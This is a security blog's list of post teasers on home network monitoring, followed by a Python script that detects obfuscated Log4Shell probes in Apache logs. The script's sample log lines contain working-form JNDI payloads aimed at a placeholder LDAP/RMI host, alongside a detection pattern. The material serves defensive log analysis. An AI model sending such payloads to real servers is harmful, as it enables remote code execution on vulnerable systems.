By Fred Theilig – @fmtheilig Occasionally mentioned in a podcast, I was only tangentially aware of the Security BSides conferences. More notice was taken while attending DEF CON this past summer, which…
Udemy for free
It was brought to my attention that Rhode Island has partnered with Udemy through Gale. If you own a library card, read this! Udemy is one of my ‘go-tos’ for getting up…
Threat Hunting for the Uninitiated
By Fred Theilig – @fmtheilig I took a look at my UniFi wifi and discovered the following: Ah! A rogue device! Did a son bring a new device into the house? Did…
A (slightly) Deeper Dive into Weird Apache Logs
By Fred Theilig – @fmtheilig My IDS alerted me to strange behavior (obfuscated Log4j) on my web server, but rather than investigate through Security Onion, I went straight to the logs. Grepping…
Banner Capture for Fun and Profit
On January 30th I saw the single suricata alert “ET SCAN Zmap User-Agent (Inbound)”. This is a low severity alert and the target was my web server. Let’s see what that’s all…
WordPress Backups
We get so caught up trying to get something to work that we forget to back it up. I’ve done it, and still do it…until something happens and I’m kicking myself in the…
A Whole Lot of Nothings
On August 18th IP address 23.227.202.82 (Tampa, Florida) triggered the suricata alert “ET SCAN MS Terminal Server Traffic on Non-standard Port” on my web server. This is apparently an attempted information leak,…
Torrent in Sheep’s Clothing
I discovered that my son was using BitTorrent. The alert “GPL P2P BitTorrent Transfer” showed up in Security Onion in the hundreds of thousands. He said he uses it to download Linux…
WUDO and, well, that was dumb
Allow me to introduce you to WUDO. WUDO is Windows Update Delivery Optimization, and not the Western Union Defence Organisation. This is a feature introduced in Windows 10 to cut down on…
An Analysis of a Log4Shell Attack
An interesting thing appeared on my Apache log doorstep in late September. What follows is the actual code received from what I am calling a probable Log4Shell exploit. I was hesitant to…
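Both the “Deeper Dive into Weird Apache Logs” and “Analysis of a Log4Shell Attack” posts above deal with obfuscated Log4j lookups landing in Apache access logs, where a plain grep for “jndi” misses probes written as `${${lower:j}ndi:...}` or `${${::-j}ndi:...}`. The script below is an added example, not code from either post: it normalizes the common obfuscation tricks (`${lower:x}`, `${upper:x}`, `${::-x}`, `${env:NAME:-x}` and percent-encoding) and then looks for a JNDI lookup. The log lines are constructed for the demo, not taken from the author’s server, and the combined-log layout is an assumption.

```python
"""Spot obfuscated Log4Shell (CVE-2021-44228) probes in Apache access-log lines.

Added example, not code from the original posts. The sample lines are
constructed; the IPs are documentation ranges, not real scanners.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (assumption).
# Line 1 is a plain probe; lines 2-4 use lower:, ::- and env:NaN:- tricks;
# line 5 is benign traffic.
SAMPLE_LOG = r'''
203.0.113.10 - - [28/Sep/2022:01:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.11 - - [28/Sep/2022:01:02:04 +0000] "GET /?x=${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.99/b} HTTP/1.1" 400 0 "-" "curl/7.81"
203.0.113.12 - - [28/Sep/2022:01:02:05 +0000] "GET / HTTP/1.1" 200 512 "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.99/c}" "Mozilla/5.0"
203.0.113.13 - - [28/Sep/2022:01:02:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap://203.0.113.99/d}"
198.51.100.7 - - [28/Sep/2022:01:02:07 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
'''

# Innermost ${...} expression: no nested "${" or "}" inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# A JNDI lookup once the obfuscation has been stripped away.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def _resolve(m):
    """Evaluate one innermost Log4j lookup the way an attacker expects."""
    body = m.group(1)
    if ":-" in body:                      # ${env:NaN:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    if body.lower().startswith("lower:"):  # ${lower:J} -> "j"
        return body[6:].lower()
    if body.lower().startswith("upper:"):  # ${upper:j} -> "J"
        return body[6:].upper()
    return m.group(0)                      # unknown lookup (e.g. jndi:) left intact


def deobfuscate(s, max_rounds=20):
    """Repeatedly collapse inner lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve, s)
        if new == s:
            break
        s = new
    return s


def scan(log_text):
    """Return one record per log line that carries a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        decoded = deobfuscate(unquote(line))   # undo %24%7B first, then lookups
        m = _JNDI.search(decoded)
        if m:
            hits.append({
                "ip": line.split()[0],
                "scheme": m.group(1).lower(),
                "decoded": decoded,
                "obfuscated": decoded != line,
            })
    return hits


def naive_hit_count(log_text):
    """What a plain case-insensitive grep for 'jndi' would have found."""
    return sum(1 for l in log_text.splitlines() if "jndi" in l.lower())


if __name__ == "__main__":
    print("naive grep hits:", naive_hit_count(SAMPLE_LOG))
    for h in scan(SAMPLE_LOG):
        print(h["ip"], h["scheme"], "obfuscated" if h["obfuscated"] else "plain")
        print("   ", h["decoded"])
```

Run against a real log with `scan(open("access.log").read())`; the `obfuscated` flag separates scanners that bothered to evade string matching from the bulk of plain `${jndi:ldap://...}` probes, which is a useful pivot when deciding which source addresses deserve a closer look.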